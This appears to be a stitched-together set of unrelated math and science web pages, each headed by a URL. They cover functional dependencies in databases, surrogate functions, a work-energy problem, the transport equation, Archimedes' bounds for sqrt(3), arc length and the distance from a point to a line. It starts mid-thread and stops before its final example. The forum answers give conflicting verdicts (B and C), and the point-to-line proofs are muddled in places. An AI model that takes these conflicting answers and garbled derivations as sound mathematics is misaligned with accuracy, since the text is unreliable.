e.g. $B$ does not functionally determine $C$ (this is true).
But we cannot say that $A$ functionally determines $B$ for the entire relation. This is because, although $A \to B$ holds for this instance, in the future some tuples might be added to the instance that violate $A \to B$.
So overall we cannot conclude $A \to B$ for the relation from the relational instance, which is just a subset of the entire relation.
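The point that an instance can only refute an FD, never establish it for the schema, can be made concrete with a small checker (my own sketch; the function name `mayHold` is mine):

```javascript
// An instance can only *refute* an FD: two rows agreeing on the LHS
// but differing on the RHS are a counterexample. Agreement everywhere
// is merely consistent with the FD, never a proof for the schema.
const rows = [[1, 1, 1], [1, 1, 0], [2, 3, 2], [2, 3, 2]]; // (A, B, C)

const mayHold = (rows, lhs, rhs) => {
  const seen = new Map();
  for (const r of rows) {
    const key = JSON.stringify(lhs.map(i => r[i]));
    const val = JSON.stringify(rhs.map(i => r[i]));
    if (seen.has(key) && seen.get(key) !== val) return false;
    seen.set(key, val);
  }
  return true;
};

const [A, B, C] = [0, 1, 2];
console.log(mayHold(rows, [A], [B])); // true  — consistent, not proven
console.log(mayHold(rows, [B], [C])); // false — B -> C is refuted
```

For the given instance, A -> B merely survives the check, while B -> C is definitively refuted, which is exactly why option C is the safe conclusion.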
• If we observe carefully, an "instance" of the relation schema R(A,B,C) is given here.
Now, as we can see, A functionally determines B for the present tuples.
But B does not determine C. That is clearly visible.
• In the future there may be tuples for which A does not determine B uniquely.
So option C is the most suitable.
Ans is C.
When the value of A is 1, B is 1. When the value of A is 2, B is 3. So A functionally determines B.
When the value of B is 1, C is 1 in one case and 0 in another. So B does not functionally determine C.
Ans will be B.
Here A -> B is satisfied (for the same value of A, B also gives a unique value).
B -> C is not satisfied (when B is 1, C gives two values: 1 and 0).
For the given instance yes, but there can be another instance also for R where the FD may not hold. So, from a given instance we can only say "no FD".
srestha @Arjun sir
The question says "From the following instance of a relation", so according to that B should be the answer. Why are we considering other possibilities? Please clear this up.
Suppose a person from religion X throws a bomb. From this can we conclude that religion X is teaching terrorism?
Likewise everything depends on the definition. FD is defined on relational schema and not on any instance alone.
https://hbfs.wordpress.com/2011/07/26/surrogate-functions/ | ## Surrogate Functions
In some optimization problems, the objective function is just too complicated to evaluate directly at every iteration, and in this case we use surrogate functions: functions that mimic most of the properties of the true objective function, but that are much simpler analytically and/or computationally.
Lately, I have done some thinking about what properties a surrogate function (or surrogate model) should have to be practical.
The Wikipedia article on surrogate models is informative, but leaves many questions open.
For example, should a surrogate function have its derivative's zeroes in the same places as the real function's derivative? Should its derivative's signs match the signs of the real function's derivatives?
In some cases, it’s quite possible to do have such a surrogate function. Let’s suppose you need to know, not the exact distance, but which points on a sphere is further than an other. If you’re dealing with the unit sphere centered on $(0,0,0)$ and points expressed as $x$, $y$, $z$, coordinates also centered on $(0,0,0)$, then if $u$ is a point and $v$ another, $\cos^{-1}(u^Tv)$ is the distance between $u$ and $v$ as measured on the sphere.
But let’s pretend that, for some reason, $\cos^{-1}(u^Tv)$ is troublesome to compute. We will want to use the surrogate $\|u-v\|$, the $L_2$, or Euclidean distance, between the two points $u$ and $v$.
The surrogate $\|u-v\|$ is well behaved relative to $\cos^{-1}(u^Tv)$. As with $\cos^{-1}(u^Tv)$, if you rotate $u$ around $v$, $\|u-v\|$ is unchanged. If you bring $u$ closer to $v$ (while remaining on the sphere), both decrease, though not at the same rate. If you push $u$ further from $v$, both grow, again not at the same rate.
The figure (omitted here) illustrates these regions.
So $\|u-v\|$ behaves mostly like $\cos^{-1}(u^Tv)$ and, by hypothesis, is much easier to compute (if a square root is a lot less costly to compute than arccos, which remains to be seen). For many algorithms, $\|u-v\|$ could be used as a cromulent surrogate.
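The agreement is no accident: on the unit sphere the chord and the arc are linked by $\|u-v\| = 2\sin(\theta/2)$ where $\theta = \cos^{-1}(u^Tv)$, and $2\sin(\theta/2)$ is monotone increasing on $[0,\pi]$, so the surrogate always orders pairs of points the same way as the true distance. A quick numerical check (my own sketch, not from the original post):

```javascript
const dot = (u, v) => u.reduce((s, ui, i) => s + ui * v[i], 0);
// True spherical distance (arc length) and its Euclidean surrogate.
const geodesic = (u, v) => Math.acos(Math.max(-1, Math.min(1, dot(u, v))));
const chordal = (u, v) => Math.hypot(...u.map((ui, i) => ui - v[i]));

const u = [1, 0, 0];
const v = [0, 1, 0];                        // 90 degrees from u
const w = [Math.SQRT1_2, Math.SQRT1_2, 0];  // 45 degrees from u
console.log(geodesic(u, v) > geodesic(u, w)); // true
console.log(chordal(u, v) > chordal(u, w));   // true: same ordering
```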
This is of course a rather simple example of surrogate, and I wonder how much one can build into the surrogate. What are the conditions for a surrogate to be well-behaved? What does it even mean to be well-behaved?
I searched a bit but found precious little on the topic. I now uncompunctiously ask you, reader, to give me hints, to suggest books, articles, or any resources on the topic.
https://socratic.org/questions/how-much-work-does-it-take-to-raise-a-46-kg-weight-3-m | # How much work does it take to raise a 46 kg weight 3 m ?
Mar 8, 2016
$W = E_p = 1353.78\ \text{J}$
$W = E_p = m \cdot g \cdot h$
$W$: work done; $E_p$: potential energy of the object; $h = 3\ \text{m}$
$W = E_p = 46 \cdot 9.81 \cdot 3$
$W = E_p = 1353.78\ \text{J}$
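A throwaway check of the arithmetic (not part of the original answer):

```javascript
// W = m * g * h with the values from the problem.
const m = 46, g = 9.81, h = 3;
console.log((m * g * h).toFixed(2)); // "1353.78"
```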
https://math.stackexchange.com/questions/2285319/nonhomogeneous-one-dimensional-transport-equation-with-boundary-condition-on-x | # Nonhomogeneous one-dimensional transport equation with boundary condition on $(x,t):x+t = 0$ instead of $t=0$
Consider the transport equation (see e.g. Evans, p. 19). The solution of the initial value problem $u_t + b \cdot Du = f$ in $\mathbb{R}^n \times (0,\infty)$ with initial condition $u = g$ on $\mathbb{R}^n \times \{t=0\}$ is given by $u(x,t) = g(x-tb) + \int^t_0 f(x+(s-t)b,s)\, ds \quad (x \in \mathbb{R}^n,\ t \geq 0).$
Now, what if we have the following ($n=1$) problem: $u_t+u_x = 1$ (i.e. $f \equiv 1$ constant) in the domain $\{(x,t) \in \mathbb{R}^2: x+t > 0\}$, with the condition $u(r,-r) = \sin(r)$ (prescribed on the boundary of the domain)?
Can we apply the solution formula of the initial value problem to solve this, and if so, how? (Do we need to perform a transformation?) Is this still called an initial value problem, or is it a boundary value problem?
• Regards @Mekanik. If I may, in your case, I don't think it is an initial value problem, since at $t=0$ we only know $u(0,0)=\sin(0)=0$. What is the PDE when $(x,t)$ is not in the domain? What is $f$ outside the domain in particular. – Arief Anbiya May 17 '17 at 17:51
• I don't really understand your question. We look for a function $u$ which is defined only on this open domain, and there it should solve the given transport equation. – Mekanik May 17 '17 at 19:37
Initial value problems are a particular case of boundary value problems, where the solution is known at $t=0$. Here, we have a boundary value problem, where the solution is known on the line $t=-x$.
For the non-homogeneous advection equation $u_t + u_x = 1$, the method of characteristics gives the Lagrange-Charpit equations $$\frac{\text{d}t}{1} = \frac{\text{d}x}{1} = \frac{\text{d}u}{1} \, .$$ Therefore, the characteristic curves in the $x$-$t$ plane are parallel straight lines with equation $x(t) = x_0 + t-t_0$, on which $u$ is not constant: $$\begin{aligned} u(x(t),t) &= u(x_0,t_0) + t-t_0\, . \end{aligned}$$ Now, since $u$ is known on the line $t=-x$, we select characteristics starting on this line, i.e., $t_0 = -x_0 = x_0 - x(t) + t$. Thus, $x_0 = \frac{1}{2}(x(t)-t)$, and $$\begin{aligned} u(x,t) &= u\left(\tfrac{1}{2}(x-t),\tfrac{1}{2}(t-x)\right) + t + \tfrac{1}{2}(x-t) \\ &= \sin\left(\tfrac{1}{2}(x-t)\right) + \tfrac{1}{2}(x+t) \, . \end{aligned}$$
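The closed-form answer can be sanity-checked numerically: a central finite difference should give $u_t + u_x \approx 1$ at interior points, and $u(r,-r)$ should reproduce $\sin(r)$ (a quick sketch of mine; the sample point is arbitrary):

```javascript
const u = (x, t) => Math.sin((x - t) / 2) + (x + t) / 2;

const h = 1e-6, x = 1.3, t = 0.7; // arbitrary point with x + t > 0
const ut = (u(x, t + h) - u(x, t - h)) / (2 * h); // central differences
const ux = (u(x + h, t) - u(x - h, t)) / (2 * h);
console.log(Math.abs(ut + ux - 1) < 1e-8);             // PDE holds: true
console.log(Math.abs(u(2, -2) - Math.sin(2)) < 1e-12); // boundary: true
```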
http://www.maa.org/publications/periodicals/convergence/a-disquisition-on-the-square-root-of-three-an-archimedean-conundrum | # A Disquisition on the Square Root of Three - An Archimedean Conundrum
Author(s):
Robert J. Wisner (New Mexico State University)
A conundrum is a riddle having only conjectural answers, and a long-standing mathematical conundrum with numerous conjectural answers is centered on how Archimedes, in his Measurement of a Circle, arrived at his famous inequality $\frac{265}{153}<\sqrt{3}<\frac{1351}{780}.$ In the first pages of [1], Heath offers only what are called "probable steps" that would lead to these inequalities. In [2], Dickson states that the two approximations, " . . . can be explained in connection with $$x^{2}-3y^{2}=-2$$, $$x^{2}-3y^{2}=1,$$" but gives no hint that Archimedes proceeded in such a manner.
In [3], Dijksterhuis argues that Archimedes might have used what is called "the Babylonian rule," equivalent to Newton’s Method for the function $$y=x^{2}-3,$$ to arrive at $$\frac{1351}{780}$$, but that rule doesn't explain the other fraction, except indirectly by means of what seems to be a curious supposition and roundabout calculations. (The Babylonian Rule asserts that in estimating a square root, make a simple but reasonable guess, then average your guess with the radicand divided by your guess to obtain a better estimate, then repeat. In our case, beginning with $$x=1$$, and computing the average of $$x$$ and $$\frac{3}{x}$$ through four iterations yields the sequence of four estimates obtained on page 4.) Heath (again) in [4] seems to mention the inequalities only in a passing manner, and Stein [5] curiously does not mention these famous Archimedean inequalities at all. To see how much attention has been paid to speculation about the above inequalities, visit the website Archimedes and the Square Root of 3.
Recall that Occam's Razor asserts that among competing explanations, the simplest is the most likely to be correct. To that end, notice that the two fractions involved here are contained in rungs nine and twelve of the Greek ladder for $$\sqrt{3}$$ on the second page of this paper. That would seem to be the simplest explanation all right, but did Archimedes know of Greek ladders or something equivalent? Did he realize that
if $$\frac{a}{b}$$ is an approximation to $$\sqrt{3},$$
then $$\frac{a+3b}{a+b}$$ is a better one?
Iterating this rule, beginning with $$\frac{1}{1}$$, yields exactly the rungs of the classical Greek ladder for $$\sqrt{3}$$. That Archimedes knew of Greek ladders or something equivalent seems a reasonable supposition, as is suggested on the second page of [6] in a quote from [2], wherein it is urged that the ancients seemed to know of Greek ladders or something equivalent to them.
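The claim is easy to verify computationally. The following sketch iterates the rule with exact rational arithmetic (note that `Fraction` reduces each rung to lowest terms, which does not change the approximations) and reproduces both Archimedean bounds at rungs nine and twelve:

```python
from fractions import Fraction

def greek_ladder_sqrt3(n):
    """Return the first n rungs of the Greek ladder for sqrt(3):
    a/b -> (a + 3b)/(a + b), starting from 1/1."""
    r = Fraction(1, 1)
    rungs = [r]
    for _ in range(n - 1):
        r = (r + 3) / (r + 1)   # same as (a + 3b)/(a + b) for r = a/b
        rungs.append(r)
    return rungs

rungs = greek_ladder_sqrt3(12)
assert rungs[8] == Fraction(265, 153)    # rung nine: Archimedes' lower bound
assert rungs[11] == Fraction(1351, 780)  # rung twelve: Archimedes' upper bound
```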
On many classroom occasions over the years, I have used Greek ladders to get simple approximations. I have also on occasion described this conundrum about the Archimedean approximations to $$\sqrt{3}$$, and students always seem surprised that there can be such current disagreements and open questions among mathematicians about so ancient a topic. This opens the door for more dialog about the open-ended nature of mathematical discovery as well as of our current understanding of the ancient history of mathematics.
Robert J. Wisner (New Mexico State University), "A Disquisition on the Square Root of Three - An Archimedean Conundrum," Loci (December 2010), DOI:10.4169/loci003514
http://www.theinfolist.com/html/ALL/s/arc_length.html | TheInfoList
Arc length is the distance between two points along a section of a curve. Determining the length of an irregular arc segment is also called rectification of a curve. The advent of infinitesimal calculus led to a general formula that provides closed-form solutions in some cases.
General approach
A curve in the plane can be approximated by connecting a finite number of points on the curve using line segments to create a polygonal path. Since it is straightforward to calculate the length of each linear segment (using the Pythagorean theorem in Euclidean space, for example), the total length of the approximation can be found by summing the lengths of each linear segment; that approximation is known as the ''(cumulative) chordal distance''. If the curve is not already a polygonal path, using a progressively larger number of segments of smaller lengths will result in better approximations. The lengths of the successive approximations will not decrease and may keep increasing indefinitely, but for smooth curves they will tend to a finite limit as the lengths of the segments get arbitrarily small. For some curves there is a smallest number $L$ that is an upper bound on the length of any polygonal approximation. These curves are called rectifiable and the number $L$ is defined as the arc length.
Definition for a smooth curve
Let $f\colon[a,b]\to\mathbb{R}^n$ be an injective and continuously differentiable function. The length of the curve defined by $f$ can be defined as the limit of the sum of line segment lengths for a regular partition of $[a,b]$ as the number of segments approaches infinity.
Finding arc lengths by integrating
If a planar curve in $\mathbb{R}^2$ is defined by the equation $y=f(x),$ where $f$ is continuously differentiable, then it is simply a special case of a parametric equation where $x = t$ and $y = f(t).$ The arc length is then given by: :$s=\int_a^b \sqrt{1+\left(\frac{dy}{dx}\right)^2}\,dx.$ Curves with closed-form solutions for arc length include the catenary, circle, cycloid, logarithmic spiral, parabola, semicubical parabola and straight line. The lack of a closed-form solution for the arc length of an elliptic and hyperbolic arc led to the development of the elliptic integrals.
Numerical integration
In most cases, including even simple curves, there are no closed-form solutions for arc length and numerical integration is necessary. Numerical integration of the arc length integral is usually very efficient. For example, consider the problem of finding the length of a quarter of the unit circle by numerically integrating the arc length integral. The upper half of the unit circle can be parameterized as $y=\sqrt{1-x^2}.$ The interval $x\in\left[-\sqrt{2}/2, \sqrt{2}/2\right]$ corresponds to a quarter of the circle. Since $dy/dx=-x/\sqrt{1-x^2}$ and $1+(dy/dx)^2 = 1/(1-x^2),$ the length of a quarter of the unit circle is :$\int_{-\sqrt{2}/2}^{\sqrt{2}/2} \frac{dx}{\sqrt{1-x^2}}.$ The 15-point Gauss–Kronrod rule estimate for this integral differs from the true length :$\Big[\arcsin x\Big]_{-\sqrt{2}/2}^{\sqrt{2}/2}=\frac{\pi}{2}$ by only a tiny amount, and the 16-point Gaussian quadrature rule estimate differs from the true length by even less. This means it is possible to evaluate this integral to almost machine precision with only 16 integrand evaluations.
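As a minimal sketch of the numerical approach (using composite Simpson's rule rather than the Gauss–Kronrod rule mentioned above), the following recovers the quarter-circle length $\pi/2$:

```python
import math

def simpson(f, a, b, n=1000):
    # Composite Simpson's rule; n must be even.
    h = (b - a) / n
    s = f(a) + f(b)
    for i in range(1, n):
        s += (4 if i % 2 else 2) * f(a + i * h)
    return s * h / 3

# Quarter of the unit circle: integrate 1/sqrt(1 - x^2) on [-sqrt(2)/2, sqrt(2)/2].
a = -math.sqrt(2) / 2
b = math.sqrt(2) / 2
length = simpson(lambda x: 1.0 / math.sqrt(1.0 - x * x), a, b)
assert abs(length - math.pi / 2) < 1e-9
```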
Curve on a surface
Let $\mathbf{x}(u,v)$ be a surface mapping and let $\mathbf{C}(t) = (u(t), v(t))$ be a curve on this surface. The integrand of the arc length integral is $|(\mathbf{x}\circ\mathbf{C})'(t)|.$ Evaluating the derivative requires the chain rule for vector fields: : $D(\mathbf{x} \circ \mathbf{C}) = (\mathbf{x}_u \ \mathbf{x}_v)\binom{u'}{v'} = \mathbf{x}_u u' + \mathbf{x}_v v'.$ The squared norm of this vector is $(\mathbf{x}_u u' + \mathbf{x}_v v') \cdot (\mathbf{x}_u u' + \mathbf{x}_v v') = g_{11}(u')^2 + 2g_{12}\,u'v' + g_{22}(v')^2$ (where $g_{ij}$ is the first fundamental form coefficient), so the integrand of the arc length integral can be written as $\sqrt{g_{ij}\,\dot u^i \dot u^j}$ (where $u^1 = u$ and $u^2 = v$).
Other coordinate systems
Let $\mathbf{C}(t) = (r(t), \theta(t))$ be a curve expressed in polar coordinates. The mapping that transforms from polar coordinates to rectangular coordinates is :$\mathbf{x}(r,\theta) = (r\cos\theta, r\sin\theta).$ The integrand of the arc length integral is $|(\mathbf{x}\circ\mathbf{C})'(t)|.$ The chain rule for vector fields shows that $D(\mathbf{x}\circ\mathbf{C}) = \mathbf{x}_r r' + \mathbf{x}_\theta \theta'.$ So the squared integrand of the arc length integral is :$(\mathbf{x}_r\cdot\mathbf{x}_r)(r')^2 + 2(\mathbf{x}_r\cdot\mathbf{x}_\theta)\,r'\theta' + (\mathbf{x}_\theta\cdot\mathbf{x}_\theta)(\theta')^2 = (r')^2 + r^2(\theta')^2.$ So for a curve expressed in polar coordinates, the arc length is :$\int_{t_1}^{t_2} \sqrt{(r')^2 + r^2(\theta')^2}\,dt = \int_{\theta(t_1)}^{\theta(t_2)} \sqrt{\left(\frac{dr}{d\theta}\right)^2 + r^2}\,d\theta.$ Now let $\mathbf{C}(t) = (r(t), \theta(t), \phi(t))$ be a curve expressed in spherical coordinates, where $\theta$ is the polar angle measured from the positive $z$-axis and $\phi$ is the azimuthal angle.
The mapping that transforms from spherical coordinates to rectangular coordinates is :$\mathbf{x}(r,\theta,\phi) = (r\sin\theta\cos\phi,\ r\sin\theta\sin\phi,\ r\cos\theta).$ Using the chain rule again shows that $D(\mathbf{x}\circ\mathbf{C}) = \mathbf{x}_r r' + \mathbf{x}_\theta \theta' + \mathbf{x}_\phi \phi'.$ All dot products $\mathbf{x}_i \cdot \mathbf{x}_j$ where $i$ and $j$ differ are zero, so the squared norm of this vector is :$(\mathbf{x}_r\cdot \mathbf{x}_r)(r')^2 + (\mathbf{x}_\theta \cdot \mathbf{x}_\theta)(\theta')^2 + (\mathbf{x}_\phi\cdot \mathbf{x}_\phi)(\phi')^2 = (r')^2 + r^2(\theta')^2 + r^2\sin^2\theta\,(\phi')^2.$ So for a curve expressed in spherical coordinates, the arc length is :$\int_{t_1}^{t_2} \sqrt{(r')^2 + r^2(\theta')^2 + r^2\sin^2\theta\,(\phi')^2}\,dt.$ A very similar calculation shows that the arc length of a curve expressed in cylindrical coordinates is :$\int_{t_1}^{t_2} \sqrt{(r')^2 + r^2(\theta')^2 + (z')^2}\,dt.$
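As a sketch of how these formulas are used in practice (the curve and grid sizes are arbitrary choices), the snippet below evaluates the polar arc-length integral for the Archimedean spiral $r=\theta$ with a midpoint rule, and cross-checks it against a direct polygonal approximation of the same curve in Cartesian coordinates:

```python
import math

def polygonal_length(f, t0, t1, n=20000):
    # Arc length via the polygonal (chordal) approximation described earlier.
    pts = [f(t0 + (t1 - t0) * i / n) for i in range(n + 1)]
    return sum(math.dist(p, q) for p, q in zip(pts, pts[1:]))

# Archimedean spiral r = theta for 0 <= theta <= 2*pi, in Cartesian form.
spiral = lambda t: (t * math.cos(t), t * math.sin(t))
L_param = polygonal_length(spiral, 0.0, 2 * math.pi)

# Polar formula: integral of sqrt((dr/dtheta)^2 + r^2) dtheta, with r = theta
# so dr/dtheta = 1; evaluated by the midpoint rule.
n = 20000
h = 2 * math.pi / n
L_polar = sum(math.sqrt(1.0 + ((i + 0.5) * h) ** 2) * h for i in range(n))

assert abs(L_param - L_polar) < 1e-3
```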
Simple cases
Arcs of circles
Arc lengths are denoted by $s$, since the Latin word for length (or size) is ''spatium''. In the following lines, $r$ represents the radius of a circle, $d$ is its diameter, $C$ is its circumference, $s$ is the length of an arc of the circle, and $\theta$ is the angle which the arc subtends at the centre of the circle. The distances $r, d, C,$ and $s$ are expressed in the same units.
* $C=2\pi r,$ which is the same as $C=\pi d.$ This equation is a definition of $\pi.$
* If the arc is a semicircle, then $s=\pi r.$
* For an arbitrary circular arc:
** If $\theta$ is in radians, then $s = r\theta.$ This is a definition of the radian.
** If $\theta$ is in degrees, then $s=\dfrac{\pi r\theta}{180^\circ},$ which is the same as $s=\dfrac{C\theta}{360^\circ}.$
** If $\theta$ is in grads (100 grads, or grades, or gradians are one right-angle), then $s=\dfrac{\pi r\theta}{200\text{ grads}},$ which is the same as $s=\dfrac{C\theta}{400\text{ grads}}.$
** If $\theta$ is in turns (one turn is a complete rotation, or 360°, or 400 grads, or $2\pi$ radians), then $s=C\theta/\text{turn}$.
Arcs of great circles on the Earth
Two units of length, the nautical mile and the metre (or kilometre), were originally defined so the lengths of arcs of great circles on the Earth's surface would be simply numerically related to the angles they subtend at its centre. The simple equation $s=\theta$ applies in the following circumstances:
* if $s$ is in nautical miles, and $\theta$ is in arcminutes ($\tfrac{1}{60}$ degree), or
* if $s$ is in kilometres, and $\theta$ is in centigrades ($\tfrac{1}{100}$ grad).
The lengths of the distance units were chosen to make the circumference of the Earth equal 40,000 kilometres, or 21,600 nautical miles: those are the numbers of the corresponding angle units (centigrades and arcminutes, respectively) in one complete turn. Those definitions of the metre and the nautical mile have been superseded by more precise ones, but the original definitions are still accurate enough for conceptual purposes and some calculations. For example, they imply that one kilometre is exactly 0.54 nautical miles. Using official modern definitions, one nautical mile is exactly 1.852 kilometres, which implies that 1 kilometre is about 0.53996 nautical miles. This modern ratio differs from the one calculated from the original definitions by less than one part in 10,000.
Length of an arc of a parabola
Historical methods
Antiquity
For much of the history of mathematics, even the greatest thinkers considered it impossible to compute the length of an irregular arc. Although Archimedes had pioneered a way of finding the area beneath a curve with his "method of exhaustion", few believed it was even possible for curves to have definite lengths, as do straight lines. The first ground was broken in this field, as it often has been in calculus, by approximation. People began to inscribe polygons within the curves and compute the length of the sides for a somewhat accurate measurement of the length. By using more segments, and by decreasing the length of each segment, they were able to obtain a more and more accurate approximation. In particular, by inscribing a polygon of many sides in a circle, they were able to find approximate values of π.
17th century
In the 17th century, the method of exhaustion led to the rectification by geometrical methods of several transcendental curves: the logarithmic spiral by Evangelista Torricelli in 1645 (some sources say John Wallis in the 1650s), the cycloid by Christopher Wren in 1658, and the catenary by Gottfried Leibniz in 1691. In 1659, Wallis credited William Neile's discovery of the first rectification of a nontrivial algebraic curve, the semicubical parabola. The accompanying figures appear on page 145. On page 91, William Neile is mentioned as ''Gulielmus Nelius''.
Integral form
Before the full formal development of calculus, the basis for the modern integral form for arc length was independently discovered by Hendrik van Heuraet and Pierre de Fermat. In 1659 van Heuraet published a construction showing that the problem of determining arc length could be transformed into the problem of determining the area under a curve (i.e., an integral). As an example of his method, he determined the arc length of a semicubical parabola, which required finding the area under a parabola. In 1660, Fermat published a more general theory containing the same result in his ''De linearum curvarum cum lineis rectis comparatione dissertatio geometrica'' (Geometric dissertation on curved lines in comparison with straight lines). Building on his previous work with tangents, Fermat used the curve :$y = x^{3/2},$ whose tangent at $x = a$ had a slope of :$\tfrac{3}{2}a^{1/2},$ so the tangent line would have the equation :$y = \tfrac{3}{2}a^{1/2}(x - a) + f(a).$ Next, he increased $a$ by a small amount to $a + \varepsilon$, making segment $AC$ a relatively good approximation for the length of the curve from $A$ to $D$. To find the length of the segment $AC$, he used the Pythagorean theorem: : $\begin{aligned} AC^2 &= AB^2 + BC^2 \\ &= \varepsilon^2 + \tfrac{9}{4}a\varepsilon^2 \\ &= \varepsilon^2\left(1 + \tfrac{9}{4}a\right) \end{aligned}$ which, when solved, yields :$AC = \varepsilon\sqrt{1 + \tfrac{9}{4}a}.$ In order to approximate the length, Fermat would sum up a sequence of short segments.
Curves with infinite length
As mentioned above, some curves are non-rectifiable. That is, there is no upper bound on the lengths of polygonal approximations; the length can be made arbitrarily large. Informally, such curves are said to have infinite length. There are continuous curves on which every arc (other than a single-point arc) has infinite length. An example of such a curve is the Koch curve. Another example of a curve with infinite length is the graph of the function defined by $f(x) = x\sin(1/x)$ on any open interval with 0 as one of its endpoints, together with $f(0) = 0$. Sometimes the Hausdorff dimension and Hausdorff measure are used to quantify the size of such curves.
Generalization to (pseudo-)Riemannian manifolds
Let $M$ be a (pseudo-)Riemannian manifold, $\gamma\colon[0,1]\to M$ a curve in $M$ and $g$ the (pseudo-)metric tensor. The length of $\gamma$ is defined to be :$\ell(\gamma)=\int_{0}^{1} \sqrt{\pm g(\gamma'(t),\gamma'(t))} \, dt,$ where $\gamma'(t)\in T_{\gamma(t)}M$ is the tangent vector of $\gamma$ at $t.$ The sign in the square root is chosen once for a given curve, to ensure that the square root is a real number. The positive sign is chosen for spacelike curves; in a pseudo-Riemannian manifold, the negative sign may be chosen for timelike curves. Thus the length of a curve is a non-negative real number. Usually no curves are considered which are partly spacelike and partly timelike. In the theory of relativity, the arc length of a timelike curve (world line) is the proper time elapsed along the world line, and the arc length of a spacelike curve is the proper distance along the curve.
See also
* Arc (geometry) * Circumference * Crofton formula * Elliptic integral * Geodesics * Intrinsic equation * Integral approximations * Line integral * Meridian arc * Multivariable calculus * Sinuosity
http://en.wikipedia.org/wiki/Distance_from_a_point_to_a_line | Distance from a point to a line
The distance from a point to a line is the shortest distance from the point to any point on the line; in Euclidean geometry this shortest path always lies along the perpendicular from the point to the line. It can be calculated in the ways described below. Knowing the shortest distance from a point to a line is useful in several situations, for example finding the shortest path to reach a road, or quantifying the scatter of points about a line on a graph.
Cartesian coordinates
In the case of a line in the plane given by the equation ax + by + c = 0, where a, b and c are real constants with a and b not both zero, the distance from the line to a point (x0,y0) is[1]
$\operatorname{distance}(ax+by+c=0, (x_0, y_0)) = \frac{|ax_0+by_0+c|}{\sqrt{a^2+b^2}}.$
[2]
Vector formulation
Illustration of the vector formulation.
Suppose we express the line in vector form:
$\mathbf{x} = \mathbf{a} + t\mathbf{n}$
where n is a unit vector. That is, a point, x, on the line is found by moving to a point a in space, then moving t units along the direction of the line.
The distance of an arbitrary point p to this line is given by
$\operatorname{distance}(\mathbf{x} = \mathbf{a} + t\mathbf{n}, \mathbf{p}) = \| (\mathbf{a}-\mathbf{p}) - ((\mathbf{a}-\mathbf{p}) \cdot \mathbf{n})\mathbf{n} \|.$
This more general formula can be used in dimensions other than two. This equation is constructed geometrically as follows: $\mathbf{a}-\mathbf{p}$ is a vector from p to the point a on the line. Then $(\mathbf{a} - \mathbf{p}) \cdot \mathbf{n}$ is the projected length onto the line and so
$((\mathbf{a} - \mathbf{p}) \cdot \mathbf{n})\mathbf{n}$
is a vector that is the projection of $\mathbf{a}-\mathbf{p}$ onto the line and so
$(\mathbf{a}-\mathbf{p}) - ((\mathbf{a}-\mathbf{p}) \cdot \mathbf{n})\mathbf{n}$
is the component of $\mathbf{a}-\mathbf{p}$ perpendicular to the line. The distance from the point to the line is then just the norm of that vector. [3]
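A minimal implementation of this vector formulation (plain Python; names are illustrative) follows the construction above step by step, and works in any dimension:

```python
import math

def point_line_distance(a, n, p):
    """Distance from point p to the line x = a + t*n, where n is a unit vector."""
    d = [ai - pi for ai, pi in zip(a, p)]            # the vector a - p
    proj = sum(di * ni for di, ni in zip(d, n))      # (a - p) . n, length of projection
    perp = [di - proj * ni for di, ni in zip(d, n)]  # component perpendicular to the line
    return math.sqrt(sum(c * c for c in perp))       # its norm is the distance

# Line y = 0 through the origin with direction (1, 0); point (3, 4) is 4 away.
assert abs(point_line_distance((0, 0), (1, 0), (3, 4)) - 4.0) < 1e-12
```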
Proof 1 (algebraic proof)
Let point (x,y) be the intersection between the line ax + by + c = 0 and the line perpendicular to ax+by+c = 0 passing through the arbitrary point (m,n).
Then it is necessary to show $a^2(n-y)^2 + b^2(m-x)^2 =2ab(m-x)(n-y).$
The above equation can be changed to $\frac{(a^2(n-y))}{(m-x)} = \frac{(b^2(m-x))}{(n-y)}$ because the slope of the line perpendicular to the line ax+by+c which contains (x,y) and (m,n) is b/a.
Then
$(a^2+b^2)((m-x)^2+(n-y)^2)=[a(m-x)+b(n-y)]^2=(am+bn+c)^2.$
So the distance is
$d=\sqrt{(m-x)^2+(n-y)^2}= \frac{|am+bn+c|}{\sqrt{a^2+b^2}}.$
[4]
Proof 2 (geometric proof)
Let the point S(m,n) be connected to the point G(x,y) on the line $ax+by+c=0$ by the segment SG, perpendicular to that line.
Draw the line $ax+by+d=0$ through the point S(m,n), parallel to $ax+by+c=0$ (so that $d=-(am+bn)$).
Let F be the point on this parallel line that lies on the line through G parallel to the y-axis. The length of GF is the absolute value of $(c-d)/b$, which is equal to the absolute value of $(am+bn+c)/b$.
Then the desired distance SG can be derived from the right triangle SGF, whose sides are in the ratio $a:b:\sqrt{a^2+b^2}$.
The absolute value of $(am+bn+c)/b$ is the hypotenuse GF of this right triangle, so multiplying it by the absolute value of $b$ and dividing by $\sqrt{a^2+b^2}$ gives $SG=|am+bn+c|/\sqrt{a^2+b^2}$, and the proof is complete.
Another possible equation
An explicit formula can also be derived for a line given in slope-intercept form, by finding the foot of the perpendicular from the point to the line and substituting:
The point P is given, where $P_x$ and $P_y$ represent the x and y coordinates of P. The equation of the line is given as $y=mx+c$. The equation of the normal to that line which passes through the point P is $y=\frac{P_x-x}{m}+P_y$.
The point at which these two lines intersect is the closest point on the original line to the point P. Hence:
$mx+c=\frac{P_x-x}{m}+P_y$
By rearranging, we can find the value of x at which they intersect.
$x=\frac{P_x+mP_y-mc}{m^2+1}$
The y coordinate can therefore be found by substituting this value of x into the equation of the original line.
$y=m\frac{(P_x+mP_y-mc)}{m^2+1}+c$
By using the equation for finding the geometric distance between 2 points $d=\sqrt{(X_2-X_1)^2+(Y_2-Y_1)^2}$, we can deduce the formula to find the shortest distance between a line and a point is the following:
$d=\sqrt{ \left( {\frac{P_x+mP_y-mc}{m^2+1}-P_x } \right) ^2 + \left( {m\frac{P_x+mP_y-mc}{m^2+1}+c-P_y }\right) ^2 }$
Note: If the line is perpendicular to the x-axis (a vertical line), its slope is undefined; in that case, swap the roles of the two axes, treating the line as horizontal with $m=0$ and swapping $P_x$ and $P_y$.
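As a consistency check, the following sketch compares the slope-intercept formula derived above with the general Cartesian formula $|ax_0+by_0+c|/\sqrt{a^2+b^2}$, for the same line written in both forms (the test line and points are arbitrary choices):

```python
import math

def dist_general(a, b, c, px, py):
    # Line in general form: a*x + b*y + c = 0.
    return abs(a * px + b * py + c) / math.hypot(a, b)

def dist_slope_intercept(m, c, px, py):
    # Line y = m*x + c, via the foot-of-perpendicular coordinates derived above.
    x = (px + m * py - m * c) / (m * m + 1)
    y = m * x + c
    return math.hypot(x - px, y - py)

# The line y = 2x + 1 is equivalent to 2x - y + 1 = 0.
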